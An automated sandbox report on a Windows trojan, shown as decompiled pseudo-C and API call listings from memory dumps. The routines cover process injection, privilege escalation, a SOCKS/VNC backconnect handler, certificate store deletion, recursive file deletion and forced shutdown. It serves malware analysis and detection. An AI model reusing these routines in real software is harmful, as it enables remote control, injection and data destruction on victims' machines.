        • CertCloseStore.CRYPT32(?,00000000), ref: 00409B0D
        Memory Dump Source
        • Source File: 00000003.00000002.204116017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.204169559.0000000000425000.00000040.00000001.sdmp
        Similarity
        • API ID: CertStore$CertificatesEnumExportSystem$CharCloseLowerOpenTime
        • String ID:
        • API String ID: 3751268071-0
        • Opcode ID: a925ade07382007ca797c4ad575b6858f029d54df0611276f709669e005de632
        • Instruction ID: 55c2a5e20a59fdd798a6655f09e320bdbc50a2022aaa17f5d3d291103c9e517f
        • Opcode Fuzzy Hash: a925ade07382007ca797c4ad575b6858f029d54df0611276f709669e005de632
        • Instruction Fuzzy Hash: 5441A571208345ABD711AF65CC81AABBBECAB88354F00093FF584F31E1D678DD498B66
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 89%
        			E004118EB(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, signed char _a8, intOrPtr _a12, intOrPtr _a16, void* _a20, long _a24, long _a28) {
        				short _v524;
        				struct _WIN32_FIND_DATAW _v1116;
        				intOrPtr _v1120;
        				intOrPtr _v1124;
        				void* _v1128;
        				int _t51;
        				signed int _t60;
        				long _t68;
        				signed char _t71;
        				signed int _t83;
        
        				_v1120 = __edx;
        				_v1124 = __ecx;
        				_t51 = E00411A47("*",  &_v524, __ecx);
        				if(_t51 == 0) {
        					L25:
        					return _t51;
        				}
        				_t51 = FindFirstFileW( &_v524,  &_v1116);
        				_v1128 = _t51;
        				if(_t51 != 0xffffffff) {
        					_t71 = _a8;
        					while(1) {
        						_t83 = 0;
        						if(_a20 != 0 && WaitForSingleObject(_a20, 0) != 0x102) {
        							break;
        						}
        						if(E0041164C( &(_v1116.cFileName)) != 0) {
        							L23:
        							if(FindNextFileW(_v1128,  &_v1116) != 0) {
        								continue;
        							}
        							break;
        						}
        						_t60 = _v1116.dwFileAttributes & 0x00000010;
        						if(_t60 == 0 || (_t71 & 0x00000002) == 0) {
        							if(_t60 != _t83 || (_t71 & 0x00000004) == 0) {
        								goto L17;
        							} else {
        								goto L10;
        							}
        						} else {
        							L10:
        							if(_a4 <= _t83) {
        								L17:
        								if((_v1116.dwFileAttributes & 0x00000010) != 0 && (_t71 & 0x00000001) != 0 && E00411A47( &(_v1116.cFileName),  &_v524, _v1124) != 0) {
        									_t103 = _a24;
        									if(_a24 != 0) {
        										Sleep(_a24);
        									}
        									E004118EB( &_v524, _v1120, _t103, _a4, _t71, _a12, _a16, _a20, _a24, _a28);
        								}
        								goto L23;
        							}
        							while(PathMatchSpecW( &(_v1116.cFileName),  *(_v1120 + _t83 * 4)) == 0) {
        								_t83 = _t83 + 1;
        								if(_t83 < _a4) {
        									continue;
        								}
        								goto L17;
        							}
        							_t68 = _a12(_a16);
        							__eflags = _t68;
        							if(_t68 == 0) {
        								break;
        							}
        							__eflags = _a28;
        							if(_a28 != 0) {
        								Sleep(_a28);
        							}
        							goto L17;
        						}
        					}
        					_t51 = FindClose(_v1128);
        				}
        			}

        APIs
          • Part of subcall function 00411A47: PathCombineW.SHLWAPI(00412BBC,00412BBC,?,00412BBC,?,?), ref: 00411A66
        • FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0041192A
        • WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 00411951
        • PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 0041199B
        • Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 004119C8
        • Sleep.KERNEL32(00000000,?,?), ref: 004119F8
        • FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 00411A26
        • FindClose.KERNEL32(?,?,?,?,00000000), ref: 00411A38
        Memory Dump Source
        • Source File: 00000003.00000002.204116017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.204169559.0000000000425000.00000040.00000001.sdmp
        Similarity
        • API ID: Find$FilePathSleep$CloseCombineFirstMatchNextObjectSingleSpecWait
        • String ID:
        • API String ID: 2348139788-0
        • Opcode ID: a70d2b9397a6aa42eec9135431d11a7fafad4018ef51344d77a2d37dcbde4672
        • Instruction ID: 98a781d7fcfd1f00f905ab67deadc3c59524c08d9a8bc59ebf1f9e6a56046893
        • Opcode Fuzzy Hash: a70d2b9397a6aa42eec9135431d11a7fafad4018ef51344d77a2d37dcbde4672
        • Instruction Fuzzy Hash: 75418FB111524A9BCB21DF10D948BDF7BA9FF44384F04452AFAA4922B1D339C895CF9A
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0040D88E(WCHAR* _a4) {
        				void* _v12;
        				intOrPtr _v16;
        				struct _TOKEN_PRIVILEGES _v28;
        				int _t23;
        
        				_t23 = 0;
        				if(OpenThreadToken(GetCurrentThread(), 0x20, 0,  &_v12) != 0 || OpenProcessToken(0xffffffff, 0x20,  &_v12) != 0) {
        					_v28.PrivilegeCount = 1;
        					_v16 = 2;
        					if(LookupPrivilegeValueW(_t23, _a4,  &(_v28.Privileges)) != 0 && AdjustTokenPrivileges(_v12, _t23,  &_v28, _t23, _t23, _t23) != 0 && GetLastError() == 0) {
        						_t23 = 1;
        					}
        					CloseHandle(_v12);
        					return _t23;
        				} else {
        					return 0;
        				}
        			}

        APIs
        • GetCurrentThread.KERNEL32 ref: 0040D89E
        • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040B17E,SeTcbPrivilege), ref: 0040D8A5
        • OpenProcessToken.ADVAPI32(000000FF,00000020,0040B17E,?,?,?,?,0040B17E,SeTcbPrivilege), ref: 0040D8B7
        • LookupPrivilegeValueW.ADVAPI32(00000000,0040B17E,?), ref: 0040D8DB
        • AdjustTokenPrivileges.ADVAPI32(0040B17E,00000000,00000001,00000000,00000000,00000000), ref: 0040D8F0
        • GetLastError.KERNEL32 ref: 0040D8FA
        • CloseHandle.KERNEL32(0040B17E), ref: 0040D909
        Memory Dump Source
        • Source File: 00000003.00000002.204116017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.204169559.0000000000425000.00000040.00000001.sdmp
        Similarity
        • API ID: Token$OpenThread$AdjustCloseCurrentErrorHandleLastLookupPrivilegePrivilegesProcessValue
        • String ID:
        • API String ID: 2724707430-0
        • Opcode ID: e692fafd4a155bcc7da70bb7f7ef57e07b8e5f707f6f61df9d4d58501e8cacb8
        • Instruction ID: fa1c77d367ea522f5039c883b6656c3056721d2891ccb828fc2d957eea6e9de3
        • Opcode Fuzzy Hash: e692fafd4a155bcc7da70bb7f7ef57e07b8e5f707f6f61df9d4d58501e8cacb8
        • Instruction Fuzzy Hash: 1A01E9B1A00208BFEB109FE19D89AEF7BACEB14355F004176F611F11A0E77499989A29
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • CryptAcquireContextW.ADVAPI32(00411A8E,00000000,00000000,00000001,F0000040,00000000,00411A8E,?,00000030,?,?,?,00411FA7,?), ref: 0040D480
        • CryptCreateHash.ADVAPI32(00008003,00008003,00000000,00000000,?,?,?,00411FA7,?), ref: 0040D498
        • CryptHashData.ADVAPI32(?,00000010), ref: 0040D4B4
        • CryptGetHashParam.ADVAPI32(?,00000002,?,00000010,00000000), ref: 0040D4CC
        • CryptDestroyHash.ADVAPI32(?), ref: 0040D4E3
        • CryptReleaseContext.ADVAPI32(?,00000000,?,?,00411FA7,?), ref: 0040D4ED
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamRelease
        • String ID:
        • API String ID: 3186506766-0
        • Opcode ID: 47821d2d89af19a63f5beecb4a05f9dfd75e647a1c983ce95bb941014fa1f7da
        • Instruction ID: c2743722f4b84324cf3778a1a33c2de62d715b4bddb92c351fd4a050cc7a2b01
        • Opcode Fuzzy Hash: 47821d2d89af19a63f5beecb4a05f9dfd75e647a1c983ce95bb941014fa1f7da
        • Instruction Fuzzy Hash: 9B11E575800148BFEF119BD4DE88EEE7B7DEB04344F008461F651B11A1D77A9E989B28
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 72%
        			E0041ADE1(void* __ecx, CHAR** _a4, signed int _a7) {
        				signed int _v6;
        				signed int _v8;
        				char _v9;
        				signed int _v16;
        				signed int _v20;
        				signed int _v24;
        				char _v28;
        				short _v30;
        				intOrPtr _v36;
        				char _v44;
        				char _v304;
        				char _v788;
        				char _v792;
        				void* __edi;
        				void* __esi;
        				int _t68;
        				signed short _t70;
        				signed int _t80;
        				void* _t95;
        				signed int _t99;
        				void* _t102;
        				signed int _t108;
        				void* _t112;
        				CHAR** _t121;
        				signed int _t130;
        				intOrPtr* _t131;
        				intOrPtr* _t138;
        				signed int _t139;
        				void* _t141;
        
        				_t123 = __ecx;
        				E0040C275( &_v304,  &_v304, 0, 0x104);
        				_t121 = _a4;
        				if(lstrcmpiA( *_t121, "socks") != 0) {
        					_t68 = lstrcmpiA( *_t121, "vnc");
        					__eflags = _t68;
        					if(_t68 != 0) {
        						_t70 = E0040C841( *_t121, _t123, 0);
        						_t6 = _t70 - 1; // -1
        						_t123 = _t6;
        						__eflags = _t6 - 0xfffd;
        						if(_t6 > 0xfffd) {
        							L32:
        							E004102C3( &_v304);
        							_a7 = 0;
        							if(_v304 <= 0) {
        								L34:
        								E0040C1C2( *_t121);
        								E0040C1C2(_t121[1]);
        								E0040C1C2(_t121[2]);
        								E0040F995(_t121[3]);
        								E0040C1C2(_t121);
        								return 0;
        							} else {
        								goto L33;
        							}
        							do {
        								L33:
        								CloseHandle( *(_t141 + (_a7 & 0x000000ff) * 4 - 0x128));
        								_a7 = _a7 + 1;
        							} while (_a7 < _v304);
        							goto L34;
        						}
        						_t80 = _t70 & 0x0000ffff;
        						_v24 = _t80;
        						__eflags = _t80;
        						if(_t80 == 0) {
        							goto L32;
        						}
        						L6:
        						_t130 = E0040F24B(E0040C841(_t121[2], _t123, 0), _t123, _t121[1]);
        						_v16 = _t130;
        						if(_t130 == 0xffffffff) {
        							goto L32;
        						}
        						E0040F5BD(_t123, _t130);
        						E0040F57B(_t130);
        						_t89 = E0040D019(E00413447(_t123,  &_v792) | 0xffffffff,  &_v788,  &_v44);
        						_t144 = _t89;
        						if(_t89 == 0) {
        							L31:
        							E0040F565(_t89, _t130);
        							goto L32;
        						}
        						_v9 = E0041285A( &_v788, _v36, _t144, _t130, 1, _v44);
        						_t89 = E0040D007( &_v44);
        						if(_v9 == 0) {
        							goto L31;
        						}
        						_t89 = E0040F472(0,  &_v16, 0, 0);
        						_t130 = _v16;
        						if(_t89 != _t130) {
        							goto L31;
        						}
        						while(1) {
        							_push(0x7530);
        							_push( &_v8);
        							_t95 = 4;
        							if(E0040F175(_t95, _t130) == 0 || _v8 <= 4) {
        								break;
        							}
        							_t138 = E0040C192(_v8 & 0x0000ffff);
        							_push(0x7530);
        							if(_t138 == 0) {
        								_t127 = _v8 & 0x0000ffff;
        								_t99 = (_v6 & 0x0000ffff) + (_v8 & 0x0000ffff) - 4;
        								L29:
        								_push(_t99);
        								_push(_t130);
        								_t89 = E0040F1BD(_t127);
        								break;
        							}
        							_push(_t138);
        							_t127 = _t130;
        							_t102 = E0040F175((_v8 & 0x0000ffff) - 4, _t130);
        							_push(_t138);
        							if(_t102 == 0) {
        								L35:
        								_t89 = E0040C1C2();
        								break;
        							}
        							_v30 = _v6;
        							_v28 =  *_t138;
        							E0040C1C2();
        							if(_v6 != 0) {
        								_t139 = E0040C192(_v6 & 0x0000ffff);
        								_t99 = _v6 & 0x0000ffff;
        								_push(0x7530);
        								__eflags = _t139;
        								if(_t139 == 0) {
        									goto L29;
        								}
        								_push(_t139);
        								_t127 = _t130;
        								_t108 = E0040F175(_t99, _t130);
        								__eflags = _t108;
        								if(_t108 == 0) {
        									_push(_t139);
        									goto L35;
        								}
        								_v20 = _t139;
        								L20:
        								if(_v28 == 2 && _v30 == 4) {
        									_t112 = 0xc;
        									_t131 = E0040C192(_t112);
        									if(_t131 != 0) {
        										 *_t131 = _a4;
        										 *((intOrPtr*)(_t131 + 4)) = _v24;
        										 *((intOrPtr*)(_t131 + 8)) =  *_v20;
        										if(E0041027E( &_v304, 0x20000, E0041AB58, _t131) == 0) {
        											E0040C1C2(_t131);
        										}
        									}
        									E0041022C(_t127,  &_v304);
        								}
        								E0040C1C2(_v20);
        								_t89 = E0040F472(0,  &_v16, 0, 0);
        								_t130 = _v16;
        								if(_t89 == _t130) {
        									continue;
        								} else {
        									break;
        								}
        							}
        							_v20 = _v20 & 0x00000000;
        							goto L20;
        						}
        						_t121 = _a4;
        						goto L31;
        					}
        					_v24 = 0xfffffffe;
        					goto L6;
        				}
        				_v24 = _v24 | 0xffffffff;
        				goto L6;
        			}

        APIs
        • lstrcmpiA.KERNEL32(?,socks,?,00000000,00000104), ref: 0041AE10
        • lstrcmpiA.KERNEL32(?,vnc), ref: 0041AE23
        • CloseHandle.KERNEL32(?), ref: 0041B040
          • Part of subcall function 0041027E: SetLastError.KERNEL32(0000009B,00413742,00000000,0041A945,00000000,00423788,00000000,00000104,74B5F560,00000000), ref: 00410288
          • Part of subcall function 0040C1C2: HeapFree.KERNEL32(00000000,00000000,0040D9B9,00000000,?,?,?,00412A7F,00000000,00412F59), ref: 0040C1D5
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.204116017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.204169559.0000000000425000.00000040.00000001.sdmp
        Similarity
        • API ID: lstrcmpi$CloseErrorFreeHandleHeapLast
        • String ID: socks$vnc
        • API String ID: 3305036421-270151703
        • Opcode ID: c37b2d7255cfd512d08f2cfa3f97230c0f944c898d2bf5b8667f48a5f8568305
        • Instruction ID: c6b4a8f2f3cb90cd793c2f587852f00a89f179ef24d16b8163d635fed46671c0
        • Opcode Fuzzy Hash: c37b2d7255cfd512d08f2cfa3f97230c0f944c898d2bf5b8667f48a5f8568305
        • Instruction Fuzzy Hash: 7A71D471900214AACF21AF65C881BFE7B75AF09314F0441BBF950BB2D2D77C8E859B99
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00411830(WCHAR* __ecx, void* __eflags) {
        				struct _WIN32_FIND_DATAW _v596;
        				short _v1116;
        				WCHAR* _t38;
        				void* _t42;
        
        				_t38 = __ecx;
        				if(E00411A47("*",  &_v1116, __ecx) == 0) {
        					L9:
        					SetFileAttributesW(_t38, 0x80);
        					return RemoveDirectoryW(_t38) & 0xffffff00 | _t19 != 0x00000000;
        				}
        				_t42 = FindFirstFileW( &_v1116,  &_v596);
        				if(_t42 == 0xffffffff) {
        					goto L9;
        				} else {
        					goto L2;
        				}
        				do {
        					L2:
        					if(E0041164C( &(_v596.cFileName)) == 0 && E00411A47( &(_v596.cFileName),  &_v1116, _t38) != 0) {
        						_t51 = _v596.dwFileAttributes & 0x00000010;
        						if((_v596.dwFileAttributes & 0x00000010) == 0) {
        							E0041151D( &_v1116);
        						} else {
        							E00411830( &_v1116, _t51);
        						}
        					}
        				} while (FindNextFileW(_t42,  &_v596) != 0);
        				FindClose(_t42);
        				goto L9;
        			}

        APIs
          • Part of subcall function 00411A47: PathCombineW.SHLWAPI(00412BBC,00412BBC,?,00412BBC,?,?), ref: 00411A66
        • FindFirstFileW.KERNEL32(?,?,?,?,?,750D46D0), ref: 00411861
        • FindNextFileW.KERNEL32(00000000,?), ref: 004118BC
        • FindClose.KERNEL32(00000000), ref: 004118C7
        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,750D46D0), ref: 004118D3
        • RemoveDirectoryW.KERNEL32(?), ref: 004118DA
        Memory Dump Source
        • Source File: 00000003.00000002.204116017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.204169559.0000000000425000.00000040.00000001.sdmp
        Similarity
        • API ID: FileFind$AttributesCloseCombineDirectoryFirstNextPathRemove
        • String ID:
        • API String ID: 765042924-0
        • Opcode ID: 9778db49502af2fdadc6ca77b78660c01a442c90fc026ba53f18238f925da15c
        • Instruction ID: c3c617e6f763e63337c502c0d662f733537104b500542e2ece54712ad519dd8d
        • Opcode Fuzzy Hash: 9778db49502af2fdadc6ca77b78660c01a442c90fc026ba53f18238f925da15c
        • Instruction Fuzzy Hash: 631182710042046AD220FBA4DD49ADF77DCAF85354F04862FFE95D21B1EB389589C65E
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • CertOpenSystemStoreW.CRYPT32(00000000,0040179C), ref: 00409B29
        • CertDuplicateCertificateContext.CRYPT32(00000000), ref: 00409B42
        • CertDeleteCertificateFromStore.CRYPT32(00000000,?,?,00000001,004138A4), ref: 00409B4D
        • CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 00409B55
        • CertCloseStore.CRYPT32(00000000,00000000), ref: 00409B61
        Memory Dump Source
        • Source File: 00000003.00000002.204116017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.204169559.0000000000425000.00000040.00000001.sdmp
        Similarity
        • API ID: Cert$Store$Certificate$CertificatesCloseContextDeleteDuplicateEnumFromOpenSystem
        • String ID:
        • API String ID: 1842529175-0
        • Opcode ID: f0b6c3931f41711a45b9bb52a3c41cfbdf010be39b2851a2efb9cc43a0996ab0
        • Instruction ID: 7e73aa0dc1f64ce36ff3f63a7143355b792968e8f8fa8fdec7ff319e70ae7bbe
        • Opcode Fuzzy Hash: f0b6c3931f41711a45b9bb52a3c41cfbdf010be39b2851a2efb9cc43a0996ab0
        • Instruction Fuzzy Hash: CBF0A73164125066D71117356D19FB7776CAB42B61B040033F644F32B18E389C85857C
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 79%
        			E00416142(void* __ebx, void* __ecx) {
        				signed int _v124;
        				signed char _t12;
        
        				_t12 =  *0x423e78;
        				if((_t12 & 0x00000010) == 0) {
        					__eflags = _t12 & 0x00000008;
        					if(__eflags != 0) {
        						E0040BB02(__ebx, __ecx, __eflags);
        						_t12 =  *0x423e78;
        					}
        					__eflags = _t12 & 0x00000003;
        					if((_t12 & 0x00000003) == 0) {
        						__eflags = _t12 & 0x00000004;
        						if((_t12 & 0x00000004) != 0) {
        							goto L8;
        						}
        						goto L9;
        					} else {
        						E0040D88E(L"SeShutdownPrivilege");
        						__eflags = 0;
        						__imp__InitiateSystemShutdownExW(0, 0, 0, 1,  *0x423e78 >> 0x00000001 & 0x00000001, 0x80000000);
        						return 0;
        					}
        				} else {
        					_t12 = E00413E6D( &_v124);
        					if(_t12 != 0) {
        						_v124 = _v124 | 0x00000020;
        						 *0x4238a0 =  *0x4238a0 | 0x00000010;
        						E00413EC5( &_v124);
        						L8:
        						return ExitWindowsEx(0x14, 0x80000000);
        					}
        					L9:
        					return _t12;
        				}
        			}






        APIs
        • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,?,80000000), ref: 004161A7
          • Part of subcall function 00413E6D: CreateMutexW.KERNEL32(004238D8,00000000,00423DF0,?,?,004141C0,?,?,?,743C152E,00000002), ref: 00413E93
        • ExitWindowsEx.USER32(00000014,80000000), ref: 004161BA
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.204116017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.204169559.0000000000425000.00000040.00000001.sdmp
        Similarity
        • API ID: CreateExitInitiateMutexShutdownSystemWindows
        • String ID: $SeShutdownPrivilege
        • API String ID: 3829579691-2253681161
        • Opcode ID: cf70afd1f6b69feace698a2376e1d0e0fac6feddbbf4c811789bc5a1c28ee17b
        • Instruction ID: 4fd853fe640b7aa60f8ee8a65211f9a7262512f6f161131cd69188482187018b
        • Opcode Fuzzy Hash: cf70afd1f6b69feace698a2376e1d0e0fac6feddbbf4c811789bc5a1c28ee17b
        • Instruction Fuzzy Hash: 20F0867150020479FA20ABB89C07FFA377C9B0174AF590029F991B31A2C66DD586C66D
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00410B1B(void* __eax, void* _a4) {
        				char _v5;
        				signed int _v12;
        				signed int _v16;
        				intOrPtr _v20;
        				long _v24;
        				void* _t37;
        				void* _t42;
        				intOrPtr* _t43;
        				int _t44;
        				long _t46;
        				void* _t47;
        				SIZE_T* _t48;
        				signed int _t50;
        				void* _t52;
        				void* _t54;
        				void* _t55;
        				void* _t60;
        				intOrPtr _t61;
        				intOrPtr _t62;
        				unsigned int _t64;
        
        				_t55 = __eax;
        				_t60 =  *((intOrPtr*)(__eax + 0x3c)) + __eax;
        				_t46 =  *(_t60 + 0x50);
        				_v24 = _t46;
        				_v5 = 0;
        				if(IsBadReadPtr(__eax, _t46) == 0) {
        					_t37 = VirtualAllocEx(_a4, 0, _t46, 0x3000, 0x40);
        					_v12 = _t37;
        					__eflags = _t37;
        					if(__eflags == 0) {
        						L17:
        						return _v12;
        					}
        					_t47 = E0040C215(__eflags, _t55, _t46);
        					_t48 = 0;
        					__eflags = _t47;
        					if(_t47 == 0) {
        						L16:
        						VirtualFreeEx(_a4, _v12, 0, 0x8000);
        						_t32 =  &_v12;
        						 *_t32 = _v12 & 0x00000000;
        						__eflags =  *_t32;
        						goto L17;
        					}
        					__eflags =  *(_t60 + 0xa4);
        					if( *(_t60 + 0xa4) <= 0) {
        						L15:
        						E0040C1C2(_t47);
        						__eflags = _v5;
        						if(_v5 != 0) {
        							goto L17;
        						}
        						goto L16;
        					}
        					_t42 =  *(_t60 + 0xa0);
        					__eflags = _t42;
        					if(_t42 <= 0) {
        						goto L15;
        					}
        					_t61 =  *((intOrPtr*)(_t60 + 0x34));
        					_t54 = _v12 - _t61;
        					_v20 = _t55 - _t61;
        					_t43 = _t42 + _t47;
        					while(1) {
        						__eflags =  *_t43 - _t48;
        						if( *_t43 == _t48) {
        							break;
        						}
        						_t62 =  *((intOrPtr*)(_t43 + 4));
        						__eflags = _t62 - 8;
        						if(_t62 < 8) {
        							L12:
        							_t43 = _t43 +  *((intOrPtr*)(_t43 + 4));
        							_t48 = 0;
        							__eflags = 0;
        							continue;
        						}
        						_t64 = _t62 + 0xfffffff8 >> 1;
        						__eflags = _t64;
        						_v16 = _t48;
        						if(_t64 == 0) {
        							goto L12;
        						} else {
        							goto L9;
        						}
        						do {
        							L9:
        							_t50 =  *(_t43 + 8 + _v16 * 2) & 0x0000ffff;
        							__eflags = _t50;
        							if(_t50 != 0) {
        								_t52 = (_t50 & 0x00000fff) +  *_t43;
        								_t19 = _t52 + _t47;
        								 *_t19 =  *(_t52 + _t47) + _t54 - _v20;
        								__eflags =  *_t19;
        							}
        							_v16 = _v16 + 1;
        							__eflags = _v16 - _t64;
        						} while (_v16 < _t64);
        						goto L12;
        					}
        					_t44 = WriteProcessMemory(_a4, _v12, _t47, _v24, _t48);
        					__eflags = _t44;
        					_t28 =  &_v5;
        					 *_t28 = _t44 != 0;
        					__eflags =  *_t28;
        					goto L15;
        				}
        				return 0;
        			}
























        APIs
        • IsBadReadPtr.KERNEL32(?,?,00000000,?,00000000), ref: 00410B37
        • VirtualAllocEx.KERNEL32(0001FEE6,00000000,?,00003000,00000040), ref: 00410B55
        • WriteProcessMemory.KERNEL32(0001FEE6,0001FEE6,00000000,00000000,00000000,?,?), ref: 00410BE7
        • VirtualFreeEx.KERNEL32(0001FEE6,0001FEE6,00000000,00008000,?,?), ref: 00410C0C
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: Virtual$AllocFreeMemoryProcessReadWrite
        • String ID:
        • API String ID: 1273498236-0
        • Opcode ID: c1c8eba55998b0a130b1b93797cdd5345c0ac84324f4bee73285edf817fd9e1d
        • Instruction ID: c2c537b15f723b929b651a7463f33673831d128b4b6dd19ee08c0baf141ae8cd
        • Opcode Fuzzy Hash: c1c8eba55998b0a130b1b93797cdd5345c0ac84324f4bee73285edf817fd9e1d
        • Instruction Fuzzy Hash: B631A071E04209AFDB149FA4CD84BEEBBB4EF45749F04806AE505B7291D7B4ADC0CB98
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0040D837(intOrPtr _a4) {
        				intOrPtr _v20;
        				void* _v32;
        				signed int _t6;
        				signed int _t7;
        				int _t9;
        				int _t14;
        				void* _t15;
        
        				_t14 = 0;
        				_t6 = CreateToolhelp32Snapshot(4, 0);
        				_t15 = _t6;
        				_t7 = _t6 | 0xffffffff;
        				if(_t15 != _t7) {
        					_v32 = 0x1c;
        					_t9 = Thread32First(_t15,  &_v32);
        					while(_t9 != 0) {
        						if(_v20 == _a4) {
        							_t14 = _t14 + 1;
        						}
        						_t9 = Thread32Next(_t15,  &_v32);
        					}
        					CloseHandle(_t15);
        					return _t14;
        				}
        				return _t7;
        			}











        APIs
        • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0040D844
        • Thread32First.KERNEL32 ref: 0040D85F
        • Thread32Next.KERNEL32 ref: 0040D875
        • CloseHandle.KERNEL32(00000000), ref: 0040D880
        Memory Dump Source
        • Source File: 00000003.00000002.204116017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.204169559.0000000000425000.00000040.00000001.sdmp
        Similarity
        • API ID: Thread32$CloseCreateFirstHandleNextSnapshotToolhelp32
        • String ID:
        • API String ID: 3643885135-0
        • Opcode ID: b97feac9ef93ceab4f5537c1a1feaa94d204b3a296c246ca7ff4a50e187a03e3
        • Instruction ID: 9968565df77b1baac6cc33fd8a092b60b0fa8c3a9746ffe8eced6c9d454bb02c
        • Opcode Fuzzy Hash: b97feac9ef93ceab4f5537c1a1feaa94d204b3a296c246ca7ff4a50e187a03e3
        • Instruction Fuzzy Hash: F1F08976900115ABDB207BA6DC48DEF7BBCEB85360B008132F922F21D0D734D946CAB9
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • socket.WS2_32(00000000,00000001,00000006), ref: 0040F30D
        • bind.WS2_32(00000000,?,-0000001D), ref: 0040F32D
        • listen.WS2_32(00000000,?), ref: 0040F33C
        • closesocket.WS2_32(00000000), ref: 0040F347
        Memory Dump Source
        • Source File: 00000003.00000002.204116017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.204169559.0000000000425000.00000040.00000001.sdmp
        Similarity
        • API ID: bindclosesocketlistensocket
        • String ID:
        • API String ID: 952684215-0
        • Opcode ID: 6148149d5010d6513f2570e3e53f748cb76949004fe90b7c93a4869994f79a59
        • Instruction ID: 6434e98ee6cfe1293092b05f1791db907e0f394683b25a1768f09193c25f03eb
        • Opcode Fuzzy Hash: 6148149d5010d6513f2570e3e53f748cb76949004fe90b7c93a4869994f79a59
        • Instruction Fuzzy Hash: A9F0377260010177D3302F799D4AE6F26A99BC5B71B180735F962E61F0D73894819524
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • socket.WS2_32(00000000,00000002,00000011), ref: 0040F5EB
        • bind.WS2_32(00000000,00000017,-0000001D), ref: 0040F60B
        • closesocket.WS2_32(00000000), ref: 0040F616
        Memory Dump Source
        • Source File: 00000003.00000002.204116017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.204169559.0000000000425000.00000040.00000001.sdmp
        Similarity
        • API ID: bindclosesocketsocket
        • String ID:
        • API String ID: 1873677229-0
        • Opcode ID: 91eb9c8734cb82417d5688b89156182ba99b7e5738ea4380e2f96627acc82d2a
        • Instruction ID: b0e97748fa6d1c419ffa3ffc0557239390a17fbf07d2c4f765a4cddc5f192a7b
        • Opcode Fuzzy Hash: 91eb9c8734cb82417d5688b89156182ba99b7e5738ea4380e2f96627acc82d2a
        • Instruction Fuzzy Hash: B3E0483220151066D2201B39BD4EE6F25A99BC57717580735B572E71F1D77888C29124
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 81%
        			E004179CD() {
        				void* _v8;
        				char _v12;
        				signed int _v16;
        				signed int _v20;
        				signed int _v24;
        				void* _v28;
        				void* _v32;
        				char _v44;
        				char _v56;
        				char _v68;
        				char _v132;
        				void* _v388;
        				void* _v644;
        				void* __ebx;
        				void* __edi;
        				void* __esi;
        				char* _t60;
        				intOrPtr* _t69;
        				intOrPtr* _t71;
        				signed int _t72;
        				intOrPtr* _t73;
        				intOrPtr* _t75;
        				signed int _t76;
        				intOrPtr* _t80;
        				signed int _t81;
        				void* _t85;
        				void* _t87;
        				void* _t91;
        				void* _t94;
        				void* _t100;
        				void* _t106;
        				intOrPtr* _t112;
        				signed int _t114;
        				intOrPtr _t122;
        				void* _t123;
        				void* _t130;
        				void* _t132;
        				intOrPtr* _t133;
        				intOrPtr* _t136;
        				void* _t141;
        
        				_t60 =  &_v32;
        				_t114 = 0;
        				_v32 = 0;
        				__imp__CoCreateInstance(0x404abc, 0, 0x4401, 0x404acc, _t60);
        				if(_t60 != 0) {
        					L3:
        					_v20 = _t114;
        					_t133 = _t114;
        					L4:
        					if(_t133 == _t114) {
        						return _t60;
        					}
        					_push(1);
        					_push(_t114);
        					_push(_t133);
        					_v12 = _t114;
        					if( *((intOrPtr*)( *_t133 + 0x40))() != 0) {
        						L33:
        						 *((intOrPtr*)( *_t133 + 8))(_t133);
        						_push(0xcc);
        						return E00417504(_t126, _v12, 0x3e);
        					}
        					_push( &_v28);
